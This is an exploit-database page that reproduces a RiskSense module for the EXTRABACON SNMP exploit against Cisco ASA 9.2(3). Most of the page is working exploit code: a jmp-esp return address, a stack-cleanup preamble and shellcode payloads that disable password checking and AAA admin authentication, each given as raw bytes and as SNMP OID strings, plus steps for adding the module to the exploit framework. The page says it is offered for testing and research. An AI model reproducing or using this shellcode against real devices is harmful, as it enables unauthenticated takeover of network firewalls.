Advertisement






Cisco ASA 9.2(3) Authentication Bypass (EXTRABACON Module)

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX Not specified Critical
Author Risk Exploitation Type Date
Not specified High Remote 2016-09-16
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.6753 0.9515

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016090127

Below is a copy:

Cisco ASA 9.2(3) Authentication Bypass (EXTRABACON Module)#
# Cisco ASA 9.2(3) Authentication Bypass (EXTRABACON Module)
#
# Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
# License: http://opensource.org/licenses/MIT
# Release Date: September 15, 2016
#
# Authors:
#           Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
#           Zachary Harding (14C0AA3670E9501ADDFC0176298CD7A969BAA8A1)
#
# Description:
#            Additional EXTRABACON module for Cisco ASA version 9.2(3).
#            This does not use the same shellcode as the Equation Group version,
#            but accomplishes the same task of disabling the auth functions
#            in less stages/bytes.
#
# Build/Run:
#            1) Save this file to versions/shellcode_asa923.py
#            2) Add the version string to fw_version_check()
#            3) Shellcode is for --pass-disable
#
 
vers = "asa923"
 
# there is a jmp esp @ 08 1d 70 1d
# 81d701c:  e8 ff e4 ff ff          call   81d5520 <_ctm_hw_free@@Base+0x50fd0>
my_ret_addr_len = 4
my_ret_addr_byte = "\x1d\x70\x1d\x08"
my_ret_addr_snmp = "29.112.29.8"
 
finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"
 
# ROPgadget --binary lina_92-3  --opcode 897dfc8b1685d2
# 0x9b78010 = function
# 0x9b78000 = byte boundary
# 0x8085a40
# 0x8085000
# preamble has a stack clean up and offset to where we first hijacked execution
# 0x9277386
preamble_len = 69
preamble_byte = "\x31\xc0\x31\xdb\x31\xf6\x31\xc9\x60\x80\xc5\x10\x80\xc2\x07\x04\x7d\x50\xbb\x00\x80\xb7\x09\xcd\x80\x58\xbb\x00\x50\x08\x08\xcd\x80\x68\x31\xc0\x40\xc3\x58\xa3\x10\x80\xb7\x09\xa3\x40\x5a\x08\x08\x61\x68\x86\x73\x27\x09\x80\xc3\x10\xbf\x0b\x0f\x0f\x0f\x89\xe5\x83\xc5\x48\xc3"
preamble_snmp = "49.192.49.219.49.246.49.201.96.128.197.16.128.194.7.4.125.80.187.0.128.183.9.205.128.88.187.0.80.8.8.205.128.104.49.192.64.195.88.163.16.128.183.9.163.64.90.8.8.97.104.134.115.39.9.128.195.16.191.11.15.15.15.137.229.131.197.72.195"
 
postscript_len = 2
postscript_byte = "\x61\xc3"
postscript_snmp = "97.195"
 
launcher_len = 6
launcher_snmp = "144.144.144.144.144.144"
launcher_byte = "\x90\x90\x90\x90\x90\x90"
 
payload_nop_len = 116
payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x1d\x80\xbe\x09\x50\xb8\x05\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3"
payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88.195"
 
payload_PMCHECK_DISABLE_len = 70
payload_PMCHECK_DISABLE_byte = "\x7a\x30\x78\x30\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\x12\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\x80\xb7\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_PMCHECK_DISABLE_snmp = "122.48.120.48.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.18.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.128.183.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
 
payload_AAAADMINAUTH_DISABLE_len = 66
payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\x5a\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.90.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum